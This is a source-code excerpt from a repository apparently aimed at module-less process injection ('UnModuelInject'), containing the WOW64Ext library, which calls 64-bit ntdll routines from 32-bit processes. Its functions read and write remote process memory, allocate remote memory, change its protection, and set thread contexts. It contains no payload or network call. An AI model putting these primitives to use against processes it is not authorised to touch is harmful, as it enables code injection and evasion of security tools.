319 | ntdll64 = GetModuleHandle64(L"ntdll.dll");
320 | return ntdll64;
321 | }
322 |
323 | DWORD64 getLdrGetProcedureAddress()
324 | {
325 | DWORD64 modBase = getNTDLL64();
326 | if (0 == modBase)
327 | return 0;
328 |
329 | IMAGE_DOS_HEADER idh;
330 | getMem64(&idh, modBase, sizeof(idh));
331 |
332 | IMAGE_NT_HEADERS64 inh;
333 | getMem64(&inh, modBase + idh.e_lfanew, sizeof(IMAGE_NT_HEADERS64));
334 |
335 | IMAGE_DATA_DIRECTORY& idd = inh.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
336 |
337 | if (0 == idd.VirtualAddress)
338 | return 0;
339 |
340 | IMAGE_EXPORT_DIRECTORY ied;
341 | getMem64(&ied, modBase + idd.VirtualAddress, sizeof(ied));
342 |
343 | DWORD* rvaTable = (DWORD*)malloc(sizeof(DWORD)*ied.NumberOfFunctions);
344 | if (nullptr == rvaTable)
345 | return 0;
346 | memset(rvaTable, 0, sizeof(DWORD)*ied.NumberOfFunctions);
347 | getMem64(rvaTable, modBase + ied.AddressOfFunctions, sizeof(DWORD)*ied.NumberOfFunctions);
348 |
349 | WORD* ordTable = (WORD*)malloc(sizeof(WORD)*ied.NumberOfFunctions);
350 | if (nullptr == ordTable) {
351 | free(rvaTable);
352 | rvaTable = nullptr;
353 | return 0;
354 | }
355 | memset(ordTable, 0, sizeof(WORD)*ied.NumberOfFunctions);
356 | getMem64(ordTable, modBase + ied.AddressOfNameOrdinals, sizeof(WORD)*ied.NumberOfFunctions);
357 |
358 | DWORD* nameTable = (DWORD*)malloc(sizeof(DWORD)*ied.NumberOfNames);
359 | if (nullptr == nameTable) {
360 | free(rvaTable);
361 | rvaTable = nullptr;
362 | free(ordTable);
363 | ordTable = nullptr;
364 | return 0;
365 | }
366 | memset(nameTable, 0, sizeof(DWORD)*ied.NumberOfNames);
367 | getMem64(nameTable, modBase + ied.AddressOfNames, sizeof(DWORD)*ied.NumberOfNames);
368 |
369 | DWORD64 dw64 = 0; size_t size_fun = sizeof("LdrGetProcedureAddress");
370 | // lazy search, there is no need to use binsearch for just one function
371 | for (DWORD i = 0; i < ied.NumberOfFunctions; i++)
372 | {
373 | if (!cmpMem64("LdrGetProcedureAddress", modBase + nameTable[i], size_fun)) {
374 | continue;
375 | } else {
376 | dw64 = modBase + rvaTable[ordTable[i]];
377 | break;
378 | }
379 | }
380 |
381 | free(rvaTable);
382 | rvaTable = nullptr;
383 | free(ordTable);
384 | ordTable = nullptr;
385 | free(nameTable);
386 | nameTable = nullptr;
387 |
388 | return dw64;
389 | }
390 |
391 | /*extern "C" __declspec(dllexport) */VOID __cdecl SetLastErrorFromX64Call(DWORD64 status)
392 | {
393 | typedef ULONG (WINAPI *RtlNtStatusToDosError_t)(NTSTATUS Status);
394 | typedef ULONG (WINAPI *RtlSetLastWin32Error_t)(NTSTATUS Status);
395 |
396 | static RtlNtStatusToDosError_t RtlNtStatusToDosError = nullptr;
397 | static RtlSetLastWin32Error_t RtlSetLastWin32Error = nullptr;
398 |
399 | if ((nullptr == RtlNtStatusToDosError) || (nullptr == RtlSetLastWin32Error))
400 | {
401 | HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
402 | RtlNtStatusToDosError = (RtlNtStatusToDosError_t)GetProcAddress(ntdll, "RtlNtStatusToDosError");
403 | RtlSetLastWin32Error = (RtlSetLastWin32Error_t)GetProcAddress(ntdll, "RtlSetLastWin32Error");
404 | }
405 |
406 | if ((nullptr != RtlNtStatusToDosError) && (nullptr != RtlSetLastWin32Error))
407 | {
408 | RtlSetLastWin32Error(RtlNtStatusToDosError((DWORD)status));
409 | }
410 | }
411 |
412 | /*extern "C" __declspec(dllexport) */DWORD64 __cdecl GetProcAddress64(DWORD64 hModule, char* funcName)
413 | {
414 | static DWORD64 _LdrGetProcedureAddress = 0;
415 | if (0 == _LdrGetProcedureAddress)
416 | {
417 | _LdrGetProcedureAddress = getLdrGetProcedureAddress();
418 | if (0 == _LdrGetProcedureAddress)
419 | return 0;
420 | }
421 |
422 | _UNICODE_STRING_T fName = { 0 };
423 | fName.Buffer = (DWORD64)funcName;
424 | fName.Length = (WORD)strlen(funcName);
425 | fName.MaximumLength = fName.Length + 1;
426 | DWORD64 funcRet = 0;
427 | X64Call(_LdrGetProcedureAddress, 4, (DWORD64)hModule, (DWORD64)&fName, (DWORD64)0, (DWORD64)&funcRet);
428 | return funcRet;
429 | }
430 |
431 | /*extern "C" __declspec(dllexport) */SIZE_T __cdecl VirtualQueryEx64(HANDLE hProcess, DWORD64 lpAddress, MEMORY_BASIC_INFORMATION64* lpBuffer, SIZE_T dwLength)
432 | {
433 | static DWORD64 ntqvm = 0;
434 | if (0 == ntqvm)
435 | {
436 | ntqvm = GetProcAddress64(getNTDLL64(), "NtQueryVirtualMemory");
437 | if (0 == ntqvm)
438 | return 0;
439 | }
440 | DWORD64 ret = 0;
441 | DWORD64 status = X64Call(ntqvm, 6, (DWORD64)hProcess, lpAddress, (DWORD64)0, (DWORD64)lpBuffer, (DWORD64)dwLength, (DWORD64)&ret);
442 | if (STATUS_SUCCESS != status)
443 | SetLastErrorFromX64Call(status);
444 | return (SIZE_T)ret;
445 | }
446 |
447 | /*extern "C" __declspec(dllexport) */DWORD64 __cdecl VirtualAllocEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
448 | {
449 | static DWORD64 ntavm = 0;
450 | if (0 == ntavm)
451 | {
452 | ntavm = GetProcAddress64(getNTDLL64(), "NtAllocateVirtualMemory");
453 | if (0 == ntavm)
454 | return 0;
455 | }
456 |
457 | DWORD64 tmpAddr = lpAddress;
458 | DWORD64 tmpSize = dwSize;
459 | DWORD64 ret = X64Call(ntavm, 6, (DWORD64)hProcess, (DWORD64)&tmpAddr, (DWORD64)0, (DWORD64)&tmpSize, (DWORD64)flAllocationType, (DWORD64)flProtect);
460 | if (STATUS_SUCCESS != ret)
461 | {
462 | SetLastErrorFromX64Call(ret);
463 | return FALSE;
464 | }
465 | else
466 | return tmpAddr;
467 | }
468 |
469 | /*extern "C" __declspec(dllexport) */BOOL __cdecl VirtualFreeEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD dwFreeType)
470 | {
471 | static DWORD64 ntfvm = 0;
472 | if (0 == ntfvm)
473 | {
474 | ntfvm = GetProcAddress64(getNTDLL64(), "NtFreeVirtualMemory");
475 | if (0 == ntfvm)
476 | return 0;
477 | }
478 |
479 | DWORD64 tmpAddr = lpAddress;
480 | DWORD64 tmpSize = dwSize;
481 | DWORD64 ret = X64Call(ntfvm, 4, (DWORD64)hProcess, (DWORD64)&tmpAddr, (DWORD64)&tmpSize, (DWORD64)dwFreeType);
482 | if (STATUS_SUCCESS != ret)
483 | {
484 | SetLastErrorFromX64Call(ret);
485 | return FALSE;
486 | }
487 | else
488 | return TRUE;
489 | }
490 |
491 | /*extern "C" __declspec(dllexport) */BOOL __cdecl VirtualProtectEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flNewProtect, DWORD* lpflOldProtect)
492 | {
493 | static DWORD64 ntpvm = 0;
494 | if (0 == ntpvm)
495 | {
496 | ntpvm = GetProcAddress64(getNTDLL64(), "NtProtectVirtualMemory");
497 | if (0 == ntpvm)
498 | return 0;
499 | }
500 |
501 | DWORD64 tmpAddr = lpAddress;
502 | DWORD64 tmpSize = dwSize;
503 | DWORD64 ret = X64Call(ntpvm, 5, (DWORD64)hProcess, (DWORD64)&tmpAddr, (DWORD64)&tmpSize, (DWORD64)flNewProtect, (DWORD64)lpflOldProtect);
504 | if (STATUS_SUCCESS != ret)
505 | {
506 | SetLastErrorFromX64Call(ret);
507 | return FALSE;
508 | }
509 | else
510 | return TRUE;
511 | }
512 |
513 | /*extern "C" __declspec(dllexport) */BOOL __cdecl ReadProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead)
514 | {
515 | static DWORD64 nrvm = 0;
516 | if (0 == nrvm)
517 | {
518 | nrvm = GetProcAddress64(getNTDLL64(), "NtReadVirtualMemory");
519 | if (0 == nrvm)
520 | return 0;
521 | }
522 | DWORD64 numOfBytes = lpNumberOfBytesRead ? *lpNumberOfBytesRead : 0;
523 | DWORD64 ret = X64Call(nrvm, 5, (DWORD64)hProcess, lpBaseAddress, (DWORD64)lpBuffer, (DWORD64)nSize, (DWORD64)&numOfBytes);
524 | if (STATUS_SUCCESS != ret)
525 | {
526 | SetLastErrorFromX64Call(ret);
527 | return FALSE;
528 | }
529 | else
530 | {
531 | if (lpNumberOfBytesRead)
532 | *lpNumberOfBytesRead = (SIZE_T)numOfBytes;
533 | return TRUE;
534 | }
535 | }
536 |
537 | /*extern "C" __declspec(dllexport) */BOOL __cdecl WriteProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
538 | {
539 | static DWORD64 nrvm = 0;
540 | if (0 == nrvm)
541 | {
542 | nrvm = GetProcAddress64(getNTDLL64(), "NtWriteVirtualMemory");
543 | if (0 == nrvm)
544 | return 0;
545 | }
546 | DWORD64 numOfBytes = lpNumberOfBytesWritten ? *lpNumberOfBytesWritten : 0;
547 | DWORD64 ret = X64Call(nrvm, 5, (DWORD64)hProcess, lpBaseAddress, (DWORD64)lpBuffer, (DWORD64)nSize, (DWORD64)&numOfBytes);
548 | if (STATUS_SUCCESS != ret)
549 | {
550 | SetLastErrorFromX64Call(ret);
551 | return FALSE;
552 | }
553 | else
554 | {
555 | if (lpNumberOfBytesWritten)
556 | *lpNumberOfBytesWritten = (SIZE_T)numOfBytes;
557 | return TRUE;
558 | }
559 | }
560 |
561 | /*extern "C" __declspec(dllexport) */BOOL __cdecl GetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext)
562 | {
563 | static DWORD64 gtc = 0;
564 | if (0 == gtc)
565 | {
566 | gtc = GetProcAddress64(getNTDLL64(), "NtGetContextThread");
567 | if (0 == gtc)
568 | return 0;
569 | }
570 | DWORD64 ret = X64Call(gtc, 2, (DWORD64)hThread, (DWORD64)lpContext);
571 | if(STATUS_SUCCESS != ret)
572 | {
573 | SetLastErrorFromX64Call(ret);
574 | return FALSE;
575 | }
576 | else
577 | return TRUE;
578 | }
579 |
580 | /*extern "C" __declspec(dllexport) */BOOL __cdecl SetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext)
581 | {
582 | static DWORD64 stc = 0;
583 | if (0 == stc)
584 | {
585 | stc = GetProcAddress64(getNTDLL64(), "NtSetContextThread");
586 | if (0 == stc)
587 | return 0;
588 | }
589 | DWORD64 ret = X64Call(stc, 2, (DWORD64)hThread, (DWORD64)lpContext);
590 | if (STATUS_SUCCESS != ret)
591 | {
592 | SetLastErrorFromX64Call(ret);
593 | return FALSE;
594 | }
595 | else
596 | return TRUE;
597 | }
598 | #endif
599 |
600 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/wow64ext.h:
--------------------------------------------------------------------------------
1 | /**
2 | *
3 | * WOW64Ext Library
4 | *
5 | * Copyright (c) 2014 ReWolf
6 | * http://blog.rewolf.pl/
7 | *
8 | * This program is free software: you can redistribute it and/or modify
9 | * it under the terms of the GNU Lesser General Public License as published
10 | * by the Free Software Foundation, either version 3 of the License, or
11 | * (at your option) any later version.
12 | *
13 | * This program is distributed in the hope that it will be useful,
14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | * GNU Lesser General Public License for more details.
17 | *
18 | * You should have received a copy of the GNU Lesser General Public License
19 | * along with this program. If not, see .
20 | *
21 | */
22 | #pragma once
23 |
24 | #include
25 |
26 | #ifndef _WIN64
27 | #ifndef STATUS_SUCCESS
28 | # define STATUS_SUCCESS 0
29 | #endif
30 |
31 | #pragma pack(push)
32 | #pragma pack(1)
33 | template
34 | struct _LIST_ENTRY_T
35 | {
36 | T Flink;
37 | T Blink;
38 | };
39 |
40 | template
41 | struct _UNICODE_STRING_T
42 | {
43 | union
44 | {
45 | struct
46 | {
47 | WORD Length;
48 | WORD MaximumLength;
49 | };
50 | T dummy;
51 | };
52 | T Buffer;
53 | };
54 |
55 | template
56 | struct _NT_TIB_T
57 | {
58 | T ExceptionList;
59 | T StackBase;
60 | T StackLimit;
61 | T SubSystemTib;
62 | T FiberData;
63 | T ArbitraryUserPointer;
64 | T Self;
65 | };
66 |
67 | template
68 | struct _CLIENT_ID
69 | {
70 | T UniqueProcess;
71 | T UniqueThread;
72 | };
73 |
74 | template
75 | struct _TEB_T_
76 | {
77 | _NT_TIB_T NtTib;
78 | T EnvironmentPointer;
79 | _CLIENT_ID ClientId;
80 | T ActiveRpcHandle;
81 | T ThreadLocalStoragePointer;
82 | T ProcessEnvironmentBlock;
83 | DWORD LastErrorValue;
84 | DWORD CountOfOwnedCriticalSections;
85 | T CsrClientThread;
86 | T Win32ThreadInfo;
87 | DWORD User32Reserved[26];
88 | //rest of the structure is not defined for now, as it is not needed
89 | };
90 |
91 | template
92 | struct _LDR_DATA_TABLE_ENTRY_T
93 | {
94 | _LIST_ENTRY_T InLoadOrderLinks;
95 | _LIST_ENTRY_T InMemoryOrderLinks;
96 | _LIST_ENTRY_T InInitializationOrderLinks;
97 | T DllBase;
98 | T EntryPoint;
99 | union
100 | {
101 | DWORD SizeOfImage;
102 | T dummy01;
103 | };
104 | _UNICODE_STRING_T FullDllName;
105 | _UNICODE_STRING_T BaseDllName;
106 | DWORD Flags;
107 | WORD LoadCount;
108 | WORD TlsIndex;
109 | union
110 | {
111 | _LIST_ENTRY_T HashLinks;
112 | struct
113 | {
114 | T SectionPointer;
115 | T CheckSum;
116 | };
117 | };
118 | union
119 | {
120 | T LoadedImports;
121 | DWORD TimeDateStamp;
122 | };
123 | T EntryPointActivationContext;
124 | T PatchInformation;
125 | _LIST_ENTRY_T ForwarderLinks;
126 | _LIST_ENTRY_T ServiceTagLinks;
127 | _LIST_ENTRY_T StaticLinks;
128 | T ContextInformation;
129 | T OriginalBase;
130 | _LARGE_INTEGER LoadTime;
131 | };
132 |
133 | template
134 | struct _PEB_LDR_DATA_T
135 | {
136 | DWORD Length;
137 | DWORD Initialized;
138 | T SsHandle;
139 | _LIST_ENTRY_T InLoadOrderModuleList;
140 | _LIST_ENTRY_T InMemoryOrderModuleList;
141 | _LIST_ENTRY_T InInitializationOrderModuleList;
142 | T EntryInProgress;
143 | DWORD ShutdownInProgress;
144 | T ShutdownThreadId;
145 |
146 | };
147 |
148 | template
149 | struct _PEB_T
150 | {
151 | union
152 | {
153 | struct
154 | {
155 | BYTE InheritedAddressSpace;
156 | BYTE ReadImageFileExecOptions;
157 | BYTE BeingDebugged;
158 | BYTE BitField;
159 | };
160 | T dummy01;
161 | };
162 | T Mutant;
163 | T ImageBaseAddress;
164 | T Ldr;
165 | T ProcessParameters;
166 | T SubSystemData;
167 | T ProcessHeap;
168 | T FastPebLock;
169 | T AtlThunkSListPtr;
170 | T IFEOKey;
171 | T CrossProcessFlags;
172 | T UserSharedInfoPtr;
173 | DWORD SystemReserved;
174 | DWORD AtlThunkSListPtr32;
175 | T ApiSetMap;
176 | T TlsExpansionCounter;
177 | T TlsBitmap;
178 | DWORD TlsBitmapBits[2];
179 | T ReadOnlySharedMemoryBase;
180 | T HotpatchInformation;
181 | T ReadOnlyStaticServerData;
182 | T AnsiCodePageData;
183 | T OemCodePageData;
184 | T UnicodeCaseTableData;
185 | DWORD NumberOfProcessors;
186 | union
187 | {
188 | DWORD NtGlobalFlag;
189 | NGF dummy02;
190 | };
191 | LARGE_INTEGER CriticalSectionTimeout;
192 | T HeapSegmentReserve;
193 | T HeapSegmentCommit;
194 | T HeapDeCommitTotalFreeThreshold;
195 | T HeapDeCommitFreeBlockThreshold;
196 | DWORD NumberOfHeaps;
197 | DWORD MaximumNumberOfHeaps;
198 | T ProcessHeaps;
199 | T GdiSharedHandleTable;
200 | T ProcessStarterHelper;
201 | T GdiDCAttributeList;
202 | T LoaderLock;
203 | DWORD OSMajorVersion;
204 | DWORD OSMinorVersion;
205 | WORD OSBuildNumber;
206 | WORD OSCSDVersion;
207 | DWORD OSPlatformId;
208 | DWORD ImageSubsystem;
209 | DWORD ImageSubsystemMajorVersion;
210 | T ImageSubsystemMinorVersion;
211 | T ActiveProcessAffinityMask;
212 | T GdiHandleBuffer[A];
213 | T PostProcessInitRoutine;
214 | T TlsExpansionBitmap;
215 | DWORD TlsExpansionBitmapBits[32];
216 | T SessionId;
217 | ULARGE_INTEGER AppCompatFlags;
218 | ULARGE_INTEGER AppCompatFlagsUser;
219 | T pShimData;
220 | T AppCompatInfo;
221 | _UNICODE_STRING_T CSDVersion;
222 | T ActivationContextData;
223 | T ProcessAssemblyStorageMap;
224 | T SystemDefaultActivationContextData;
225 | T SystemAssemblyStorageMap;
226 | T MinimumStackCommit;
227 | T FlsCallback;
228 | _LIST_ENTRY_T FlsListHead;
229 | T FlsBitmap;
230 | DWORD FlsBitmapBits[4];
231 | T FlsHighIndex;
232 | T WerRegistrationData;
233 | T WerShipAssertPtr;
234 | T pContextData;
235 | T pImageHeaderHash;
236 | T TracingFlags;
237 | };
238 |
239 | typedef _LDR_DATA_TABLE_ENTRY_T LDR_DATA_TABLE_ENTRY32;
240 | typedef _LDR_DATA_TABLE_ENTRY_T LDR_DATA_TABLE_ENTRY64;
241 |
242 | typedef _TEB_T_ TEB32;
243 | typedef _TEB_T_ TEB64;
244 |
245 | typedef _PEB_LDR_DATA_T PEB_LDR_DATA32;
246 | typedef _PEB_LDR_DATA_T PEB_LDR_DATA64;
247 |
248 | typedef _PEB_T PEB32;
249 | typedef _PEB_T PEB64;
250 |
251 | typedef struct DECLSPEC_ALIGN(16) _M128A {
252 | ULONGLONG Low;
253 | LONGLONG High;
254 | } M128A, *PM128A;
255 |
256 | #define nullptr NULL
257 |
258 |
259 | struct _XSAVE_FORMAT64
260 | {
261 | WORD ControlWord;
262 | WORD StatusWord;
263 | BYTE TagWord;
264 | BYTE Reserved1;
265 | WORD ErrorOpcode;
266 | DWORD ErrorOffset;
267 | WORD ErrorSelector;
268 | WORD Reserved2;
269 | DWORD DataOffset;
270 | WORD DataSelector;
271 | WORD Reserved3;
272 | DWORD MxCsr;
273 | DWORD MxCsr_Mask;
274 | _M128A FloatRegisters[8];
275 | _M128A XmmRegisters[16];
276 | BYTE Reserved4[96];
277 | };
278 |
279 | struct _CONTEXT64
280 | {
281 | DWORD64 P1Home;
282 | DWORD64 P2Home;
283 | DWORD64 P3Home;
284 | DWORD64 P4Home;
285 | DWORD64 P5Home;
286 | DWORD64 P6Home;
287 | DWORD ContextFlags;
288 | DWORD MxCsr;
289 | WORD SegCs;
290 | WORD SegDs;
291 | WORD SegEs;
292 | WORD SegFs;
293 | WORD SegGs;
294 | WORD SegSs;
295 | DWORD EFlags;
296 | DWORD64 Dr0;
297 | DWORD64 Dr1;
298 | DWORD64 Dr2;
299 | DWORD64 Dr3;
300 | DWORD64 Dr6;
301 | DWORD64 Dr7;
302 | DWORD64 Rax;
303 | DWORD64 Rcx;
304 | DWORD64 Rdx;
305 | DWORD64 Rbx;
306 | DWORD64 Rsp;
307 | DWORD64 Rbp;
308 | DWORD64 Rsi;
309 | DWORD64 Rdi;
310 | DWORD64 R8;
311 | DWORD64 R9;
312 | DWORD64 R10;
313 | DWORD64 R11;
314 | DWORD64 R12;
315 | DWORD64 R13;
316 | DWORD64 R14;
317 | DWORD64 R15;
318 | DWORD64 Rip;
319 | _XSAVE_FORMAT64 FltSave;
320 | _M128A Header[2];
321 | _M128A Legacy[8];
322 | _M128A Xmm0;
323 | _M128A Xmm1;
324 | _M128A Xmm2;
325 | _M128A Xmm3;
326 | _M128A Xmm4;
327 | _M128A Xmm5;
328 | _M128A Xmm6;
329 | _M128A Xmm7;
330 | _M128A Xmm8;
331 | _M128A Xmm9;
332 | _M128A Xmm10;
333 | _M128A Xmm11;
334 | _M128A Xmm12;
335 | _M128A Xmm13;
336 | _M128A Xmm14;
337 | _M128A Xmm15;
338 | _M128A VectorRegister[26];
339 | DWORD64 VectorControl;
340 | DWORD64 DebugControl;
341 | DWORD64 LastBranchToRip;
342 | DWORD64 LastBranchFromRip;
343 | DWORD64 LastExceptionToRip;
344 | DWORD64 LastExceptionFromRip;
345 | };
346 |
347 | // Below defines for .ContextFlags field are taken from WinNT.h
348 | #ifndef CONTEXT_AMD64
349 | #define CONTEXT_AMD64 0x100000
350 | #endif
351 |
352 | #define CONTEXT64_CONTROL (CONTEXT_AMD64 | 0x1L)
353 | #define CONTEXT64_INTEGER (CONTEXT_AMD64 | 0x2L)
354 | #define CONTEXT64_SEGMENTS (CONTEXT_AMD64 | 0x4L)
355 | #define CONTEXT64_FLOATING_POINT (CONTEXT_AMD64 | 0x8L)
356 | #define CONTEXT64_DEBUG_REGISTERS (CONTEXT_AMD64 | 0x10L)
357 | #define CONTEXT64_FULL (CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT)
358 | #define CONTEXT64_ALL (CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS)
359 | #define CONTEXT64_XSTATE (CONTEXT_AMD64 | 0x20L)
360 |
361 | #pragma pack(pop)
362 |
363 | //extern "C"
364 | //{
365 | /*__declspec(dllexport)*/DWORD64 __cdecl X64Call(DWORD64 func, int argC, ...);
366 | /*__declspec(dllexport)*/DWORD64 __cdecl GetModuleHandle64(wchar_t* lpModuleName);
367 | /*__declspec(dllexport)*/DWORD64 __cdecl GetProcAddress64(DWORD64 hModule, char* funcName);
368 | /*__declspec(dllexport)*/SIZE_T __cdecl VirtualQueryEx64(HANDLE hProcess, DWORD64 lpAddress, MEMORY_BASIC_INFORMATION64* lpBuffer, SIZE_T dwLength);
369 | /*__declspec(dllexport)*/DWORD64 __cdecl VirtualAllocEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
370 | /*__declspec(dllexport)*/BOOL __cdecl VirtualFreeEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD dwFreeType);
371 | /*__declspec(dllexport)*/BOOL __cdecl VirtualProtectEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flNewProtect, DWORD* lpflOldProtect);
372 | /*__declspec(dllexport)*/BOOL __cdecl ReadProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
373 | /*__declspec(dllexport)*/BOOL __cdecl WriteProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
374 | /*__declspec(dllexport)*/BOOL __cdecl GetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext);
375 | /*__declspec(dllexport)*/BOOL __cdecl SetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext);
376 | /*__declspec(dllexport)*/VOID __cdecl SetLastErrorFromX64Call(DWORD64 status);
377 | //}
378 | #endif
379 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/wow64ext_old.cpp:
--------------------------------------------------------------------------------
1 | /**
2 | *
3 | * WOW64Ext Library
4 | *
5 | * Copyright (c) 2014 ReWolf
6 | * http://blog.rewolf.pl/
7 | *
8 | * This program is free software: you can redistribute it and/or modify
9 | * it under the terms of the GNU Lesser General Public License as published
10 | * by the Free Software Foundation, either version 3 of the License, or
11 | * (at your option) any later version.
12 | *
13 | * This program is distributed in the hope that it will be useful,
14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | * GNU Lesser General Public License for more details.
17 | *
18 | * You should have received a copy of the GNU Lesser General Public License
19 | * along with this program. If not, see .
20 | *
21 | */
22 |
23 | #include
24 |
25 | #ifndef _WIN64
26 | #include
27 | #include
28 | #include "internal.h"
29 | #include "wow64ext.h"
30 |
31 | #pragma comment(lib, "Shlwapi.lib")
32 |
33 | int _mywcsicmp(const wchar_t *string1, const wchar_t *string2)
34 | {
35 | wchar_t c1;
36 | wchar_t c2;
37 | int i = 0;
38 | do
39 | {
40 | c1 = string1[i];
41 | if (c1 >= 'A' && c1 <= 'Z')
42 | c1 += 0x20;
43 |
44 | c2 = string2[i];
45 | if (c2 >= 'A' && c2 <= 'Z')
46 | c2 += 0x20;
47 |
48 | i++;
49 | } while (c1 && c1 == c2);
50 | return c1 - c2;
51 | }
52 |
53 | #pragma warning(push)
54 | #pragma warning(disable : 4409)
55 | /*extern "C" __declspec(dllexport) */DWORD64 __cdecl X64Call(DWORD64 func, int argC, ...)
56 | {
57 | va_list args;
58 | va_start(args, argC);
59 | reg64 _rcx = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
60 | reg64 _rdx = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
61 | reg64 _r8 = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
62 | reg64 _r9 = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
63 | reg64 _rax = { 0 };
64 |
65 | reg64 restArgs = { (DWORD64)&va_arg(args, DWORD64) };
66 |
67 | // conversion to QWORD for easier use in inline assembly
68 | reg64 _argC = { (DWORD64)argC };
69 | DWORD back_esp = 0;
70 |
71 | __asm
72 | {
73 | ;// keep original esp in back_esp variable
74 | mov back_esp, esp
75 |
76 | ;// align esp to 0x10, without aligned stack some syscalls may return errors !
77 | ;// (actually, for syscalls it is sufficient to align to 8, but SSE opcodes
78 | ;// requires 0x10 alignment), it will be further adjusted according to the
79 | ;// number of arguments above 4
80 | and esp, 0xFFFFFFF0
81 |
82 | X64_Start();
83 |
84 | ;// below code is compiled as x86 inline asm, but it is executed as x64 code
85 | ;// that's why it need sometimes REX_W() macro, right column contains detailed
86 | ;// transcription how it will be interpreted by CPU
87 |
88 | ;// fill first four arguments
89 | REX_W mov ecx, _rcx.dw[0] ;// mov rcx, qword ptr [_rcx]
90 | REX_W mov edx, _rdx.dw[0] ;// mov rdx, qword ptr [_rdx]
91 | push _r8.v ;// push qword ptr [_r8]
92 | X64_Pop(_R8); ;// pop r8
93 | push _r9.v ;// push qword ptr [_r9]
94 | X64_Pop(_R9); ;// pop r9
95 | ;//
96 | REX_W mov eax, _argC.dw[0] ;// mov rax, qword ptr [_argC]
97 | ;//
98 | ;// final stack adjustment, according to the ;//
99 | ;// number of arguments above 4 ;//
100 | test al, 1 ;// test al, 1
101 | jnz _no_adjust ;// jnz _no_adjust
102 | sub esp, 8 ;// sub rsp, 8
103 | _no_adjust: ;//
104 | ;//
105 | push edi ;// push rdi
106 | REX_W mov edi, restArgs.dw[0] ;// mov rdi, qword ptr [restArgs]
107 | ;//
108 | ;// put rest of arguments on the stack ;//
109 | REX_W test eax, eax ;// test rax, rax
110 | jz _ls_e ;// je _ls_e
111 | REX_W lea edi, dword ptr [edi + 8*eax - 8] ;// lea rdi, [rdi + rax*8 - 8]
112 | ;//
113 | _ls: ;//
114 | REX_W test eax, eax ;// test rax, rax
115 | jz _ls_e ;// je _ls_e
116 | push dword ptr [edi] ;// push qword ptr [rdi]
117 | REX_W sub edi, 8 ;// sub rdi, 8
118 | REX_W sub eax, 1 ;// sub rax, 1
119 | jmp _ls ;// jmp _ls
120 | _ls_e: ;//
121 | ;//
122 | ;// create stack space for spilling registers ;//
123 | REX_W sub esp, 0x20 ;// sub rsp, 20h
124 | ;//
125 | call func ;// call qword ptr [func]
126 | ;//
127 | ;// cleanup stack ;//
128 | REX_W mov ecx, _argC.dw[0] ;// mov rcx, qword ptr [_argC]
129 | REX_W lea esp, dword ptr [esp + 8*ecx + 0x20] ;// lea rsp, [rsp + rcx*8 + 20h]
130 | ;//
131 | pop edi ;// pop rdi
132 | ;//
133 | // set return value ;//
134 | REX_W mov _rax.dw[0], eax ;// mov qword ptr [_rax], rax
135 |
136 | X64_End();
137 |
138 | mov ax, ds
139 | mov ss, ax
140 | mov esp, back_esp
141 | }
142 | return _rax.v;
143 | }
144 | #pragma warning(pop)
145 |
146 | void getMem64(void* dstMem, DWORD64 srcMem, size_t sz)
147 | {
148 | if ((nullptr == dstMem) || (0 == srcMem) || (0 == sz))
149 | return;
150 |
151 | reg64 _src = { srcMem };
152 |
153 | __asm
154 | {
155 | X64_Start();
156 |
157 | ;// below code is compiled as x86 inline asm, but it is executed as x64 code
158 | ;// that's why it need sometimes REX_W() macro, right column contains detailed
159 | ;// transcription how it will be interpreted by CPU
160 |
161 | push edi ;// push rdi
162 | push esi ;// push rsi
163 | ;//
164 | mov edi, dstMem ;// mov edi, dword ptr [dstMem] ; high part of RDI is zeroed
165 | REX_W mov esi, _src.dw[0] ;// mov rsi, qword ptr [_src]
166 | mov ecx, sz ;// mov ecx, dword ptr [sz] ; high part of RCX is zeroed
167 | ;//
168 | mov eax, ecx ;// mov eax, ecx
169 | and eax, 3 ;// and eax, 3
170 | shr ecx, 2 ;// shr ecx, 2
171 | ;//
172 | rep movsd ;// rep movs dword ptr [rdi], dword ptr [rsi]
173 | ;//
174 | test eax, eax ;// test eax, eax
175 | je _move_0 ;// je _move_0
176 | cmp eax, 1 ;// cmp eax, 1
177 | je _move_1 ;// je _move_1
178 | ;//
179 | movsw ;// movs word ptr [rdi], word ptr [rsi]
